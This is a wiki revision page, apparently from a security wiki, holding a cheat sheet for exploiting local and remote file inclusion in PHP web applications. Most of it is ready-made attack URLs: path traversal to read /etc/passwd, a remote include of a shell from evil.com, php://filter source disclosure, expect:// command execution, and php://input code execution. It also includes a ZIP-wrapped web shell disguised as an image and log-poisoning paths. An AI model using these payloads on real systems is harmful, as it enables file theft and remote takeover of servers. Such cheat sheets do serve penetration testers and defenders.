Difference between revisions of "Exploiting Local/Remove File Inclusion"
(→LFI / RCI via input://) |
|||
Line 43: | Line 43: | ||
http://example.com/index.php?page=php://input | http://example.com/index.php?page=php://input | ||
DATA: <? system('whoami'); ?> | DATA: <? system('whoami'); ?> | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | == LFI / RCE via input:// == | ||
+ | <syntaxhighlight lang="bash"> | ||
+ | http://example.com/index.php?page=php://input | ||
+ | DATA: <? system('whoami'); ?> | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | == LFI / RCE via Log file == | ||
+ | Append PHP to a log file and include it | ||
+ | <syntaxhighlight lang="bash"> | ||
+ | http://example.com/index.php?page=/var/log/apache/access.log | ||
+ | http://example.com/index.php?page=/var/log/apache/error.log | ||
+ | http://example.com/index.php?page=/var/log/vsftpd.log | ||
+ | http://example.com/index.php?page=/var/log/sshd.log | ||
+ | |||
+ | http://example.com/index.php?page=/var/log/apache/access.log | ||
</syntaxhighlight> | </syntaxhighlight> |
Revision as of 14:19, 26 April 2018
Contents
What is LFI / RFI?
Local/Remove File Inclusion vulnerability allows an attacker to exploit a dynamic file inclusion mechanism of a web application to access files outside the intended spectre.
What is LFI / RFI?
Local/Remove File Inclusion vulnerability allows an attacker to exploit a dynamic file inclusion mechanism of a web application to access files outside the intended spectre.
LFI / RFI Cheat Sheet
http://example.com/index.php?page=../../../etc/passwd
http://example.com/index.php?page=../../../etc/passwd%00
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
http://example.com/index.php?page=php:expect://id
http://example.com/index.php?page=php:expect://ls
http://example.com/index.php?page=path/to/uploaded/file.png
http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
LFI Wrapper with ZIP
Crate a PHP payload (e.g.: system($_GET['cmd']), zip, masking your archive as a file with different, acceptable extension
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php
Execute
http://example.com/index.php?page=zip://shell.jpg%23payload.php
LFI / RCE via input://
http://example.com/index.php?page=php://input
DATA: <? system('whoami'); ?>
LFI / RCE via input://
http://example.com/index.php?page=php://input
DATA: <? system('whoami'); ?>
LFI / RCE via Log file
Append PHP to a log file and include it
http://example.com/index.php?page=/var/log/apache/access.log
http://example.com/index.php?page=/var/log/apache/error.log
http://example.com/index.php?page=/var/log/vsftpd.log
http://example.com/index.php?page=/var/log/sshd.log
http://example.com/index.php?page=/var/log/apache/access.log